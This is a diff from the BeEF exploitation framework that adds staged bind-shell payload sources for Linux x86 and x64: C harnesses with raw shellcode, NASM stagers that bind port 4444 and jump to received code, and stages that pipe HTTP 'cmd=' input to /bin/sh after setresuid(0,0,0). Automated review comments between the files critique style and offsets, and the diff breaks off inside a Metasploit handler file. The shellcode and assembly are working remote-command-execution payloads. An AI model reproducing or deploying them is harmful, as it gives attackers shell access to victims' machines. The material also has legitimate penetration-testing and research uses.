diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
new file mode 100755
index 000000000..58fee2877
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -fno-stack-protector -z execstack -o socket64 socket64.c
+**/
+
+#include
+#include
+#include
+#include
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6";
+
+int main(int argc, char **argv) {
+ char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+ if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+ memcpy(ptr, shellcode, sizeof(shellcode));
+ sc = (int(*)())ptr;
+ (void)((void(*)())ptr)();
+ printf("\n");
+ return 0;
+}
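Review bot: The global `sc` is assigned at `sc = (int(*)())ptr;` but never read — the call on the next line goes through a second, differently typed cast — so the store is dead and the two casts disagree on the signature; either call through `sc` or drop the global, e.g. `((void (*)(void))ptr)();` with the `int (*sc)();` declaration removed. `exit(-1)` leaves the process with status 255; `exit(EXIT_FAILURE)` says what is meant. This file, like stage64.nasm and stager64.nasm, is added with mode 100755 although it is a source file, whereas the x86 counterparts are 100644. The `#include` lines carry no header names in this rendering, so the set of headers could not be checked. The dead `sc` and `exit(-1)` points apply unchanged to linux/x86/socket.c in this commit.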
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
new file mode 100755
index 000000000..2489775d3
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
@@ -0,0 +1,285 @@ +BITS 64 + +SECTION .text +global _start +_start: + cld ;clear direction flag + xor rdx,rdx ;zero rdx + + push BYTE 0x02 + pop r14 + + ;create two pipes +createpipes: + push rdx ;allocate space on the stack + mov rdi, rsp ;point to the stack + push BYTE 0x16 + pop rax ;sys_pipe + syscall + dec r14 + test r14, r14 ;create 2 pipes + je endcreatepipes + jmp createpipes + +endcreatepipes: + ;sys_fork + push BYTE 0x39 + pop rax + syscall + cmp eax, 0x00 ;parent or child? + je child + + xor rdi, rdi ; zero rdi + mov edi, DWORD [rsp+0x8] ; close read end of one pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x4] ;close write end of the other pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + ;make non-blocking + mov edi, DWORD [rsp] ;fd + push BYTE 0x04 + pop rsi ;F_SETFL + xor rdx, rdx + mov rdx, 0x800 ;O_NONBLOCK + push BYTE 0x48 + pop rax ; sys_fcntl + syscall + + + ;allocate one page of memory + xor rdi,rdi ;system determines location + push 0x1000 ;allocated size + pop rsi + push BYTE 0x07 + pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC + push BYTE 0x22 + pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE + push rdi + push rdi + pop r9 ;offset + pop r8 ;fd + push BYTE 0x09 + pop rax + syscall + mov r14, rax ;save pointer allocated memory for later use + +doforever: + ;initialize socket + xor rdx, rdx ;zero rdx (proto =0) + push BYTE 0x01 + pop rsi ;SOCK_STREAM + push BYTE 0x02 + pop rdi ;AF_INET = 2 + push BYTE 0x29 + pop rax ;sys_socket + syscall + mov rbx, rax ; save socket filediscriptor + + ;reuse socket + push 0x01 ;true + mov r10, rsp ;ptr to optval + push BYTE 0x08 + pop r8 ;sizeof socklen_t + push BYTE 0x02 + pop rdx ;SO_REUSEADDR = 2 + push BYTE 0x01 + pop rsi ;SOL_SOCKET = 1 + mov rdi, rbx ;socketfd + push BYTE 0x36 ;sys_setsockopt + pop rax + syscall + + pop rax ;clean stack + + + ;bind socket to port + xor rax,rax + push BYTE 0x10 + pop rdx ;addrlen + push rax + push rax + mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 
4444 + mov rsi, rsp ;ptr to sokaddr + mov rdi, rbx ;socketfd + push BYTE 0x31 + pop rax ;sys_bind + syscall + + pop rax ;clean stack + pop rax + + ;listen + xor rsi, rsi ;backlog ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x32 + pop rax ;sys_listen + syscall + + ;accept + xor rdx,rdx ;addrlen ptr = NULL + xor rsi,rsi ;sockaddr ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x2b + pop rax ;sys_accept + syscall + + mov r15, rax ;save client socket fd for later use + + ;close serversocket + mov rdi, rbx ;close server socket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + + mov rcx, 0x1000 ;pagesize +firstzeromemory: + ;zero out memory + dec rcx + mov rbx, r14 + add rbx, rcx + mov BYTE [rbx], 0x00 + jrcxz readfromsocket + jmp firstzeromemory + +readfromsocket: + xor rdx, rdx + + ;read into allocated memory + mov rdi, r15 ;client socketfd + mov rsi, r14 ;ptr to allocated memory + mov dx, 0x400 ;read 1024 bytes + push BYTE 0x00 + pop rax ;sys_read + syscall + + mov rcx, 0x400 ;search in 1024 bytes + mov rbx, r14 ;ptr to allocated memory +search: + cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd=" + je found ;cmd= found + inc rbx + dec rcx + jrcxz notfound ;cmd= not in recieved buffer + jmp search ;search some more +found: + xor rdi, rdi + mov rcx, rbx + add rcx, 0x03 ;skip "cmd" + mov rsi, rcx + mov edi, DWORD [rsp+0xC] ;write to pipe +sendcommand: + inc rsi ;first time skip "=", move to next byte + push BYTE 0x01 + pop rdx ;write one byte + push BYTE 0x01 + pop rax ;sys_write + syscall + cmp BYTE [rsi], 0x0a ;LF character? 
+ jne sendcommand ;else continue write to pipe + + ;sleep one second + push BYTE 0x23 + pop rax ;sys_nanosleep + push DWORD 0x00 + push DWORD 0x01 ;one second + mov rdi, rsp ;ptr to argument array + xor rsi, rsi ;NULL + syscall + + pop rax ;clean stack + pop rax + +notfound: + call writehttpheaders + db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a + db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a + +writehttpheaders: + pop rsi ;source address saved by call + mov rdi, r14 ;ptr to allocated memory + add rdi, 0x400 ;skip 1024 bytes + mov rcx, 0x62 ;copy 98 bytes + rep movsb + + xor rdi, rdi ;zero rdi + mov edi, DWORD [rsp] ;read from pipe + mov rsi, r14 ;ptr to allocated memory + add rsi, 0x400 ;skip 1024 bytes + add rsi, 0x62 ;skip header + mov rdx, 0xb86 ;read max 2950 bytes + xor rax,rax ;sys_read + syscall + + + mov rdi, r15 ;clientsocket fd + mov rsi, r14 ;ptr to allocated memory + add rsi, 0x400 ;skip 1024 first bytes + mov rdx, 0xbe8 ;send max 3048 bytes + push BYTE 0x01 + pop rax ;sys_write + syscall + + mov rdi, r15 ;close clientsocket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + jmp doforever +child: + xor rdi, rdi + mov edi, DWORD [rsp+0xc] ;close output side of pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + xor rdi, rdi ;close stdin + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x08] ;dup input side to stdin + push BYTE 0x20 + pop rax ;sys_dup + syscall + + + mov edi, DWORD [rsp] ;close input side of other pipe + push BYTE 0x03 + pop rax ;sys_close + syscall + + xor rdi, rdi + inc rdi ;close stdout + push 
BYTE 0x03 + pop rax ;sys_close + syscall + + mov edi, DWORD [rsp+0x4] ;dup output side to stdout + push BYTE 0x20 + pop rax ;sys_dup + syscall + + ;setresuid(0,0,0) + xor rdi, rdi + xor rsi, rsi + xor rdx, rdx + push BYTE 0x75 + pop rax ;sys_resuid + syscall + + push BYTE 0x3b + pop rax ;sys_execve + mov rdi, 0x0068732f6e69622f ;/bin/shNULL + push rdi ;push to stack + mov rdi, rsp ;ptr to stack + xor rsi, rsi ;NULL + xor rdx, rdx ;NULL + syscall diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm new file mode 100755 index 000000000..1a5d776bb --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm 
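Review bot: stage64.nasm has no license header, while the x86 stage.nasm and stager.nasm in this commit open with the three-line `; Copyright (c) 2006-2013 Wade Alcorn ...` block; stager64.nasm has the same gap. Several comments mislabel the code: the `setresuid(0,0,0)` block is annotated `;sys_resuid` (should read `;sys_setresuid`), `filediscriptor` and `recieved` are misspelled, and `xor rdx, rdx` immediately followed by `mov rdx, 0x800` is redundant. The `;PORT 0x115c = 4444` comment on the bind sockaddr should say that this is the constant the MSF wrapper rewrites through `'LPORT' => [ 165, 'n' ]` in beef_bind-stage-linux-x64.rb, since inserting any instruction before it moves that offset. The `Content-Length: 3048` header bytes and `mov rdx, 0xbe8 ;send max 3048 bytes` are the same constant in two places with nothing tying them together; a comment such as `;must match the Content-Length in the header bytes above` on the latter would help the next maintainer.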
@@ -0,0 +1,106 @@ +BITS 64 + +SECTION .text +global _start +_start: + cld ;clear direction flag + xor rdx, rdx ;zero rdx (proto=0) + push BYTE 0x01 + pop rsi ;SOCK_STREAM + push BYTE 0x02 + pop rdi ;AF_INET = 2 + push BYTE 0x29 + pop rax ;sys_socket + syscall + mov rbx, rax ; save socket filediscriptor + + ;reuse socket + push 0x01 ;true + mov r10, rsp ;ptr to optval + push BYTE 0x08 + pop r8 ;sizeof socklen_t + push BYTE 0x02 + pop rdx ;SO_REUSEADDR = 2 + push BYTE 0x01 + pop rsi ;SOL_SOCKET = 1 + mov rdi, rbx ;socketfd + push BYTE 0x36 ;sys_setsockopt + pop rax + syscall + + xor rax,rax + push BYTE 0x10 + pop rdx ;addrlen + push rax + push rax + mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444 + mov rsi, rsp ;ptr to sokaddr + mov rdi, rbx ;socketfd + push BYTE 0x31 + pop rax ;sys_bind + syscall + + xor rsi, rsi ;backlog ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x32 + pop rax ;sys_listen + syscall + + ;accept + xor rdx,rdx ;addrlen ptr = NULL + xor rsi,rsi ;sockaddr ptr = NULL + mov rdi, rbx ;socketfd + push BYTE 0x2B + pop rax ;sys_accept + syscall + + mov r15, rax ;save client socket fd for later use + + mov rdi, rbx ;close server socket fd + push BYTE 0x03 + pop rax ;sys_close + syscall + + ;allocate memory + + xor rdi,rdi ;system determines location + push 0x1000 ;allocated size + pop rsi + push BYTE 0x07 + pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC + push BYTE 0x22 + pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE + push rdi + push rdi + pop r9 ;offset + pop r8 ;fd + push BYTE 0x09 + pop rax + syscall + mov r14, rax ;save pointer allocated memory for later use + + ;read into allocated memory + mov rdi, r15 ;client socketfd + mov rsi, r14 ;ptr to allocated memory + mov dx, 0x1000 ;read one page of memory + push BYTE 0x00 + pop rax ;sys_read + syscall + + ;close clientsocketfd + mov rdi, r15 ;client socketfd + push BYTE 0x03 + pop rax ;sys_close + syscall + + mov rsi, r14 ;ptr to allocated memory +search: + cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd=" + je 
short found ;cmd= found
+ inc rsi
+ jmp short search ;search some more
+found:
+ push BYTE 0x04 ;skip "cmd="
+ pop rax
+ add rsi, rax
+ jmp rsi ;jump to stage
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
new file mode 100644
index 000000000..f4e198fa3
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -m32 -fno-stack-protector -z execstack -o socket socket.c
+**/
+
+#include
+#include
+#include
+#include
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7";
+
+int main(int argc, char **argv) {
+ char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+ if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+ memcpy(ptr, shellcode, sizeof(shellcode));
+ sc = (int(*)())ptr;
+ (void)((void(*)())ptr)();
+ printf("\n");
+ return 0;
+}
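Review bot: The stager's `cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd="` means the received stage must be framed with a `cmd=` prefix, yet none of the MSF stage modules added in this commit show that prefix being prepended, so the framing contract exists only in this one instruction and belongs in a header comment, e.g. `;expects the stage to arrive as "cmd=" immediately followed by code`. Unlike the search loop in stage64.nasm, which counts rcx down over 0x400 bytes, this `search:` loop has no bound, which the same comment should state. `mov dx, 0x1000 ;read one page of memory` is only correct because rdx still holds the small value left by `pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC` a few lines up; that dependency is worth a comment. The same undocumented framing assumption applies to linux/x86/stager.nasm.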
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm
new file mode 100644
index 000000000..3ec5d952b
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm
@@ -0,0 +1,290 @@ +; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +; Browser Exploitation Framework (BeEF) - http://beefproject.com +; See the file 'doc/COPYING' for copying permission + +BITS 32 + +SECTION .text + +global _start +_start: + cld ;clear direction flag + xor edx, edx ;zero edx + + push BYTE 0x02 + pop ecx + ;create two pipes +createpipes: + push edx ;allocate space on stack + push edx + mov ebx, esp ; ptr to argument array + push BYTE 0x2A ;sys_pipe + pop eax + int 0x80 ;syscall + dec ecx + jcxz endcreatepipes ;jmp when both pipes are created + jmp short createpipes ;create next pipe + +endcreatepipes: + ;create fork + xor ebx, ebx ;zero ebx + push BYTE 0x02 ;sys_fork + pop eax + int 0x80 ;syscall + cmp eax, 0x00 ;parent or child + je child + + mov ebx, [esp+0x8] ;close read end of one pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov ebx, [esp+0x4] ;close write end of the other pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + ; make non blocking + mov ebx, [esp] ;fd + push BYTE 0x04 ;F_SETFL + pop ecx + push 0x800 ;O_NONBLOCK + pop edx + push BYTE 0x37 ;sys_fcntl + pop eax + int 0x80 + + ;allocate one page of memory + push BYTE 0x00 ;offset = 0 + push 0xffffffff ;fd=-1 + push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE + push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC + push 0x1000 ;allocated size + push 0x00 ;system determines location + mov ebx, esp ;ptr to argument array + push BYTE 0x5a + pop eax + int 0x80 + mov edi, eax ;ptr to allocated memory + add esp, 0x18 + +doforever: + xor edx, edx + xor eax, eax + + ;initialize socket + push BYTE 0x01 + pop ebx ;SYS_SOCKET + push eax ;proto = 0 + inc eax + push eax ;SOCK_STREAM = 1 + inc eax + push eax ;AF_INET = 2 + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + mov esi, eax ; save socket filedescriptor + add esp, 0x0C + + ;reuse socket + push BYTE 0x0E + pop ebx ;SYS_SETSOCKOPT + push BYTE 0x04 ;sizeof socklen_t + 
push esp ;address of socklen_t + push BYTE 0x02 ;SO_REUSEADDR = 2 + push BYTE 0x01 ;SOL_SOCKET = 1 + push esi ;socket fd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x14 + + ;bind socket to port + push BYTE 0x02 + pop ebx ;SYS_BIND + push edx ;INADDR_ANY + push 0x5c110002 ;PORT 0x115c = 4444 + mov ecx, esp ;ptr to server struct + push BYTE 0x10 ; addrlen + push ecx + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x14 + + inc ebx + inc ebx ;SYS_LISTEN + push ebx ;backlog + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ; socketcall is syscall #102 + int 0x80 + add esp, 0x08 + + inc ebx ;SYS_ACCEPT + push edx ;socklen = 0 + push edx ;sockaddr ptr = NULL + push esi ;sockfd + mov ecx, esp ;ptr to argumet array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + add esp, 0x0c + + xchg esi, eax ;serversocket in eax and clientsocket handler in esi + xchg eax, ebx ;serversocket in ebx + mov eax, 0x06 ;close serversocket + int 0x80 + + mov ecx, 0x1000 +firstzeromemory: + ;zero out memory + dec ecx + mov ebx, edi + add ebx, ecx + mov BYTE [ebx], 0x00 + jecxz readfromsocket + jmp firstzeromemory + +readfromsocket: + ;read from socket into memory + mov dx, 0x400 ;read 1024 bytes + mov ecx, edi ;ptr to allocated memory + mov ebx, esi ;clientsocket + push BYTE 0x03 + pop eax ;sys_read + int 0x80 + + push edi ;ptr to allocate memory + push esi ;clientsocket + mov ebx, edi ;ptr to allocated memory + mov ecx, 0x400 ;search in 1024 bytes +search: + cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd=" + je found ;cmd= found + inc ebx + dec ecx + jecxz notfound ;cmd= not in recieved buffer + jmp search ;search some more + +found: + mov ecx, ebx ;put ptr to memory where "cmd=" was found + add ecx, 0x03 ;skip "cmd" + mov ebx, [esp+0x14] ;write to pipe +sendcommand: + inc ecx ;first 
time skip "=", move to next byte + push BYTE 0x01 ;write one byte + pop edx + push BYTE 0x04 ;sys_write + pop eax + int 0x80 + cmp BYTE [ecx], 0x0a ;LF character? + jne sendcommand ;else continue write to pipe + + ;sleep one second + push 0x00 + push 0x01 ;one second + mov ebx, esp ;ptr to argument array + xor ecx, ecx ;NULL + mov eax, 0xA2 ;sys_nanosleep + int 0x80 + add esp, 0x08 ;clean up stack + +notfound: + call writehttpheaders + db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a ;HTTP/1.1 200 OK + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a ;Content-Type: text/html + db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a ;Access-Control-Allow-Origin: * + db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a ;Content-Length: 3048 + +writehttpheaders: + pop esi ;source address saved by call + add edi, 0x400 ;ptr to memory skip 1024 bytes + mov ecx, 0x62 ;copy 98 bytes + rep movsb + + pop edi ;restore clientsocket + pop esi ;restore ptr to memory + + + mov ebx, [esp] ;read from pipe + mov ecx, esi ;ptr to memory + add ecx, 0x400 ;skip 1024 bytes + add ecx, 0x62 ;skip header + push 0xB86 ;read max 2950 bytes + pop edx + push BYTE 0x03 ;sys_read + pop eax + int 0x80 + + mov ebx, edi ;clientsocket + mov ecx, esi ;ptr to memory + add ecx, 0x400 ;skip 1024 first bytes + mov edx, 0xbe8 ;send max 3048 bytes + push BYTE 0x04 ;sys_write + pop eax + int 0x80 + + ;close clientsocket + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov edi, esi ;restore memory ptr into edi + jmp doforever + +child: + mov ebx, [esp+0xC] ;close output side of pipe + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + xor ebx, ebx ;close stdin + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + 
mov ebx, [esp+0x8] ;dup input side to stdin + push BYTE 0x29 ;sys_dup + pop eax + int 0x80 + + mov ebx, [esp] ;close input side of other pipe + push BYTE 0x06 + pop eax + int 0x80 + + xor ebx, ebx + inc ebx ;close stdout + push BYTE 0x06 ;sys_close + pop eax + int 0x80 + + mov ebx, [esp+0x4] ;dup output side to stdout + push BYTE 0x29 ;sys_dup + pop eax + int 0x80 + + ;setresuid(0,0,0) + xor eax, eax + xor ebx, ebx + xor ecx, ecx + xor edx, edx + mov al, 0xa4 ;sys_setresuid16 + int 0x80 + + ;execve("/bin//sh", 0, 0) + xor eax, eax + push eax + push eax + push 0x68732f2f ;//sh + push 0x6e69622f ;/bin + mov ebx, esp + push BYTE 0x0b ;sys_execve + pop eax + int 0x80 diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm new file mode 100644 index 000000000..903a7f0b4 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm 
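Review bot: The pipe-creation loop uses `jcxz endcreatepipes` while every other loop in the file uses `jecxz`; in 32-bit code `jcxz` assembles with a 0x67 address-size prefix (visible as `\x67\xe3\x02` in the bytes embedded in beef_bind-stage-linux-x86.rb) and tests only cx, so `jecxz endcreatepipes` is both consistent with the rest of the file and one byte shorter. The mmap argument block mixes `push BYTE 0x00 ;offset = 0` with `push 0x00 ;system determines location`, which assembles to the 5-byte imm32 form (`\x68\x00\x00\x00\x00` in the same payload); `push BYTE 0x00`, as stager.nasm writes it, matches the surrounding pushes. A comment on `mov ebx, [esp+0x14] ;write to pipe` noting that the extra 0x8 relative to the child's `mov ebx, [esp+0xC]` accounts for the `push edi`/`push esi` saved just before `search` would spare the next reader the stack arithmetic. Comment typos: `argumet`, `recieved`.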
@@ -0,0 +1,111 @@ +; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +; Browser Exploitation Framework (BeEF) - http://beefproject.com +; See the file 'doc/COPYING' for copying permission + +BITS 32 + +SECTION .text + +global _start +_start: + cld ;clear direction flag + xor eax, eax ;zero eax + xor edx, edx ;zero edx + + ;initialize socket + push BYTE 0x01 + pop ebx ;SYS_SOCKET + push eax ; proto = 0 + inc eax + push eax ;SOCK_STREAM = 1 + inc eax + push eax ;AF_INET = 2 + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + mov esi, eax ;save socket filediscriptor + + push BYTE 0x0E + pop ebx ;SYS_SETSOCKOPT + push BYTE 0x04 ;sizeof socklen_t + push esp ; address of socklen_t + push BYTE 0x02 ;SO_REUSEADDR = 2 + push BYTE 0x01 ;SOL_SOCKET = 1 + push esi ;socket fd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ; socketcall is syscall #102 + int 0x80 + + ;bind socket to port + push BYTE 0x02 + pop ebx ;SYS_BIND + push edx ;INADDR_ANY + push 0x5c110002 ;PORT 0x115C = 4444 + mov ecx, esp ;server struct + push BYTE 0x10 ;addrlen + push ecx + push esi ;socketfd + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + inc ebx + inc ebx ;SYS_LISTEN + push ebx ;backlog + push esi ;socketfd + mov ecx, esp ;ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + inc ebx ;SYS_ACCEPT + push edx ;socklen = 0 + push edx ;sockaddr ptr = NULL + push esi ;socketfd + mov ecx, esp ; ptr to argument array + push BYTE 0x66 + pop eax ;socketcall is syscall #102 + int 0x80 + + xchg esi, eax ;serversocket in eax and client socket handler into esi + xchg eax, ebx ;serversocket in ebx + mov eax, 0x6 ;close serversocket + int 0x80 + + push BYTE 0x00 ;offset =0 + push 0xFFFFFFFF ;fd = -1 + push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE + push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC + push 0x1000 ;allocated size + push BYTE 
0x00 ;system determines location + mov ebx, esp ;ptr tot argument array + push BYTE 0x5a + pop eax ;MMAP call + int 0x80 + mov edi, eax ;ptr to allocated memory + + ; read from socket into memory + mov dx, 0x1000 ;max bytes to read + mov ecx, edi ;pointer to memory + mov ebx, esi ;clientsocket + push BYTE 0x03 + pop eax + int 0x80 + + push BYTE 0x06 + pop eax ;close clientsocket + int 0x80 + +search: + cmp DWORD [edi], 0x3d646d63 ;compare with "cmd=" + je short found ;jump if found + inc edi ;look some further + jmp short search +found: + push BYTE 0x04 + pop eax + add edi, eax ;skip "cmd=" + jmp edi ;jump to the staged shellcode diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb new file mode 100644 index 000000000..29be93ecd --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb 
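Review bot: Unlike stage.nasm, which restores esp after each socketcall (`add esp, 0x14` and so on), the stager never pops the argument arrays it pushes for socket, setsockopt, bind, listen, accept and mmap, so esp has moved by 0x60 bytes by the time of `jmp edi`; that is presumably harmless because the stage only uses the stack relative to the esp it inherits, but a comment saying so would stop a reader from treating it as a leak. `mov dx, 0x1000 ;max bytes to read` relies on edx still being zero from the `xor edx, edx` at `_start`, which holds but is not stated. Typo: `;ptr tot argument array`.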
@@ -0,0 +1,73 @@
+##
+# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+module Msf
+module Handler
+
+###
+#
+# This module implements the Bind TCP handler placeholder only.
+#
+###
+module BeEFBind
+
+ include Msf::Handler
+
+ #
+ # Returns the handler specific string representation
+ #
